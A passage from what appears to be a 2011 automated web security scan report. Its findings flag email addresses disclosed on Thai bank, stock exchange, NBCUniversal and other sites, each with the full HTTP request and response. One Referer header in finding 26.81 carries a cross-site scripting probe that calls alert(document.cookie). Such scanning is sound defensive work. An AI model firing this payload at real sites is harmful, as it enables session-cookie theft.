Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29472

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.81. http://www.ktam.co.th/en/index.php/style/page.txt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/style/page.txt

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/style/page.txt HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:50 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29474

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.82. http://www.ktam.co.th/en/news.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/news.php

Issue detail

The following email address was disclosed in the response:

Request

GET /en/news.php HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 302
Date: Tue, 03 May 2011 13:37:17 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Location: news_ktam.php?err=1
Connection: close
Content-Type: text/html
Content-Length: 19561

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>Krung Thai Asset Management Public Company Limited. :- Happy Life Happy Investment</title>
<link href="style/
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.83. http://www.ktam.co.th/th/news.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /th/news.php

Issue detail

The following email address was disclosed in the response:

Request

GET /th/news.php HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 302
Date: Tue, 03 May 2011 13:37:24 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Location: news_ktam.php?err=1
Connection: close
Content-Type: text/html
Content-Length: 19758

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>............................ ....... ..... (.....) :- ............................</title>
<link href="style/
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.84. http://www.ktb.co.th/css/master.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktb.co.th
Path:   /css/master.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/master.css HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/en/main/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:44:47 GMT
Content-length: 18248
Content-type: text/css
Last-modified: Thu, 18 Nov 2010 04:02:25 GMT
Etag: "4748-4ce4a551"
Accept-ranges: bytes

/*
* XHTML CSS Coder by Apisit Asavatappitak
* E-mail: iii_jsiega@hotmail.com
*
* Copyright 2010, Apisit Asavatappitak
*
*/

@import url('header.css');
@import url('footer.css');
@import url('typography.css');
@import url('sub-menu.css');
@import url('screen.css');

/* relo
...[SNIP]...

26.85. http://www.mindworkscorp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mindworkscorp.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.mindworkscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=vt7j68qo3d3q8jfgfpr3ahhvp1; path=/
Content-Type: text/html
Content-Length: 6766


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <title>MindWorks. Corporate Training in Meditation and Stress Management</titl
...[SNIP]...
<a href="mailto:info@mindworkscorp.com">info@mindworkscorp.com</a>
...[SNIP]...

26.86. http://www.mindworkscorp.com/bio.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mindworkscorp.com
Path:   /bio.html

Issue detail

The following email address was disclosed in the response:

Request

GET /bio.html HTTP/1.1
Host: www.mindworkscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mindworkscorp.com/
Cookie: PHPSESSID=gavq34o9sgpum0ggncioesfte0; __utma=218847493.1214711855.1304447526.1304447526.1304447526.1; __utmb=218847493.1.10.1304447526; __utmc=218847493; __utmz=218847493.1304447526.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:44:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 6724


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <title>MindWorks. Corporate Training in Meditation and Stress Management</titl
...[SNIP]...
<a href="mailto:info@mindworkscorp.com">info@mindworkscorp.com</a>
...[SNIP]...

26.87. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_js/jQuery.inlinePager.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcuni.com
Path:   /wordpress/wp-content/themes/theme-nbcuni/_js/jQuery.inlinePager.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wordpress/wp-content/themes/theme-nbcuni/_js/jQuery.inlinePager.js HTTP/1.1
Host: www.nbcuni.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuni.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10
Last-Modified: Fri, 05 Nov 2010 16:49:44 GMT
ETag: "97c3ac2-2f77-494510fbaba00"
Accept-Ranges: bytes
Content-Length: 12151
Wirt: qw-p-wordpress03.qwplatform.com
Content-Type: application/javascript
Pool-Info: pool_wordpress_prod 66.77.88.182 80
Cache-Control: max-age=300
Expires: Tue, 03 May 2011 13:31:08 GMT
Date: Tue, 03 May 2011 13:26:08 GMT
Connection: close

/*
* jQuery.inlinePager. pagination plugin
*
* Copyright (c) 2010 NBCUDPS
*
* Maintained by Cristiana Yambo
* cristiana.yambo@nbcuni.com
*
* Launch : January 2010
* Version : 1.1
* Released: May 24, 2010

1.1: added className on numbered pagination LI's
*/
//takes a list and makes an animated paginated list with optional easin
...[SNIP]...

26.88. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_js/jquery.paginator.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcuni.com
Path:   /wordpress/wp-content/themes/theme-nbcuni/_js/jquery.paginator.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wordpress/wp-content/themes/theme-nbcuni/_js/jquery.paginator.js HTTP/1.1
Host: www.nbcuni.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuni.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10
Last-Modified: Tue, 08 Feb 2011 15:36:11 GMT
ETag: "97c3b0b-37f2-49bc71b9e50c0"
Accept-Ranges: bytes
Content-Length: 14322
Wirt: qw-p-wordpress03.qwplatform.com
Content-Type: application/javascript
Pool-Info: pool_wordpress_prod 66.77.88.182 80
Cache-Control: max-age=209
Expires: Tue, 03 May 2011 13:29:37 GMT
Date: Tue, 03 May 2011 13:26:08 GMT
Connection: close

//-------------------------------------------------
//        Quick Pager jquery plugin
//        Created by dan and emanuel @geckonm.com
//        www.geckonewmedia.com
//
//        v1.1 + proposal
//        18/09/09 * bug fix by John V - http://blog.geekyjohn.com/
// 16/10/09 * proposal to uncouple page changing and selector by fairsayan@gmail.com
//-------------------------------------------------

(function($) {
$.fn.selectPage = function(page) {
       return this.each(function() {
           if(($('.'+this.pagerOptions.paginationClassName).find('.di
...[SNIP]...

26.89. http://www.nbcuniversalstore.com/js/omniture/s_code_dageneral.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcuniversalstore.com
Path:   /js/omniture/s_code_dageneral.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/omniture/s_code_dageneral.js HTTP/1.1
Host: www.nbcuniversalstore.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/
Cookie: SESSID=dd19ab195577124911a017a83007c863; DASHORTNAME=nbcuniversalstore; DAABTEST=B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 28 Apr 2011 00:08:59 GMT
ETag: "33e90ec-5f5a-4a1ef5d27fcc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Tue, 03 May 2011 13:26:21 GMT
Connection: close
Content-Length: 24410

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
Plu
...[SNIP]...
.hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;
...[SNIP]...

26.90. http://www.nbcuniversalstore.com/nbcuniversalstore/behavior/typeface-0.15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcuniversalstore.com
Path:   /nbcuniversalstore/behavior/typeface-0.15.js

Issue detail

The following email address was disclosed in the response:

Request

GET /nbcuniversalstore/behavior/typeface-0.15.js HTTP/1.1
Host: www.nbcuniversalstore.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/
Cookie: SESSID=dd19ab195577124911a017a83007c863; DASHORTNAME=nbcuniversalstore; DAABTEST=B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 12 Apr 2011 18:49:29 GMT
ETag: "5b83a8-5f13-4a0bd26ea6040"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Tue, 03 May 2011 13:26:19 GMT
Connection: close
Content-Length: 24339

/*****************************************************************

typeface.js, version 0.15 | typefacejs.neocracy.org

Copyright (c) 2008 - 2009, David Chester davidchester@gmx.net

Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, includ
...[SNIP]...

26.91. https://www.scbbusinessnet.com/cs70_banking/js/jquery.mousewheel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/js/jquery.mousewheel.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cs70_banking/js/jquery.mousewheel.js HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.scbbusinessnet.com/cs70_banking/logon/sbuser
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:19 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 12 Jan 2010 03:38:40 GMT
Accept-Ranges: bytes
Content-Length: 2496
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

/* Copyright (c) 2006 Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
* Thanks t
...[SNIP]...

26.92. https://www.scbbusinessnet.com/cs70_banking/news/Scripts/jquery.mousewheel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/news/Scripts/jquery.mousewheel.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cs70_banking/news/Scripts/jquery.mousewheel.js HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.scbbusinessnet.com/cs70_banking/news/en/scbbus-home-des.html
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:36 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 20 Jan 2010 06:33:22 GMT
Accept-Ranges: bytes
Content-Length: 2496
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

/* Copyright (c) 2006 Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
* Thanks t
...[SNIP]...

26.93. http://www.set.or.th/en/contact/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /en/contact/contact.html

Issue detail

The following email address was disclosed in the response:

Request

GET /en/contact/contact.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=418

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:07:30 GMT
Server: Apache
Last-Modified: Fri, 29 Oct 2010 10:05:11 GMT
ETag: "dc6fd-87d4-980e83c0"
Accept-Ranges: bytes
Content-Length: 34772
Content-Type: text/html

<html><!-- InstanceBegin template="/Templates/set-en.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>The Stock Exchange of Thailand: FAQs - Ab
...[SNIP]...
<br>
e-mail : kanyakorn@set.or.th<br>
...[SNIP]...

26.94. http://www.set.or.th/en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html

Issue detail

The following email address was disclosed in the response:

Request

GET /en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:24 GMT
Server: Apache
Last-Modified: Tue, 08 Mar 2011 08:45:17 GMT
ETag: "7800a2-6911-a1aea140"
Accept-Ranges: bytes
Content-Length: 26897
Content-Type: text/html

<html><!-- InstanceBegin template="/Templates/set-en.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>The Stock Exchange of Thailand - IPO Showc
...[SNIP]...
<a href="mailto:issuerservices@set.or.th" class="leftmenu">email:
issuerservices@set.or.th </a>
...[SNIP]...

26.95. http://www.set.or.th/en/sitemap/for_listing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /en/sitemap/for_listing.html

Issue detail

The following email address was disclosed in the response:

Request

GET /en/sitemap/for_listing.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:56 GMT
Server: Apache
Last-Modified: Wed, 30 Jun 2010 04:10:59 GMT
ETag: "78016f-6039-8a8a5ac0"
Accept-Ranges: bytes
Content-Length: 24633
Content-Type: text/html

<html><!-- InstanceBegin template="/Templates/noleftmenu-en.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>The Stock Exchange of Thailand: You
...[SNIP]...
<a href="mailto:issuerservices@set.or.th">issuerservices@set.or.th</a>
...[SNIP]...

26.96. http://www.set.or.th/highlight/pr-th.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /highlight/pr-th.html

Issue detail

The following email address was disclosed in the response:

Request

GET /highlight/pr-th.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/highlight/info_th.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:47:43 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 06:45:18 GMT
ETag: "134ed2-2038-7bb39b80"
Accept-Ranges: bytes
Content-Length: 8248
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
...................................................... ...........................
................................................ .......... 08 1710 9462,
08 1710 6894 .... csrclub@lca.or.th .............................................</a>
...[SNIP]...

26.97. http://www.set.or.th/scripts/JSCookMenu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /scripts/JSCookMenu.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /scripts/JSCookMenu.js HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/th/index.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:41:08 GMT
Server: Apache
Last-Modified: Wed, 09 Jun 2010 09:51:47 GMT
ETag: "78c0a8-adb6-daab32c0"
Accept-Ranges: bytes
Content-Length: 44470
Content-Type: application/x-javascript

/*
   JSCookMenu v2.0.4 (c) Copyright 2002-2006 by Heng Yuan

   http://jscook.sourceforge.net/JSCookMenu/

   Permission is hereby granted, free of charge, to any person obtaining a
   copy of this sof
...[SNIP]...
<georg@lonux.de>
...[SNIP]...
<Burton@ntopsupport.com>
...[SNIP]...
<felix@bebinary.com>
...[SNIP]...
<anders@netspace.net.au>
...[SNIP]...
<dick@netrex.nl>
...[SNIP]...

26.98. http://www.zlmc.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zlmc.org
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.zlmc.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.zlmc.org/mindfulness-meditation.html?gclid=CLbmzNHyy6gCFUff4AodPQinqQ
Cookie: e7c4e00d12966c6a9d383111e612e1a5=365b943ca2f1b614f235e4910df6f14c; __utma=1.1018395735.1304447535.1304447535.1304447535.1; __utmb=1.1.10.1304447535; __utmc=1; __utmz=1.1304447535.1.1.utmgclid=CLbmzNHyy6gCFUff4AodPQinqQ|utmccn=(not%20set)|utmcmd=(not%20set)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:44:22 GMT
Server: Apache/2.2.17
X-Powered-By: PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 13:44:23 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<a href="mailto:info@zlmc.org">info@zlmc.org</a>
...[SNIP]...

26.99. http://www.zlmc.org/mindfulness-meditation.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zlmc.org
Path:   /mindfulness-meditation.html

Issue detail

The following email address was disclosed in the response:

Request

GET /mindfulness-meditation.html?gclid=CLbmzNHyy6gCFUff4AodPQinqQ HTTP/1.1
Host: www.zlmc.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:01 GMT
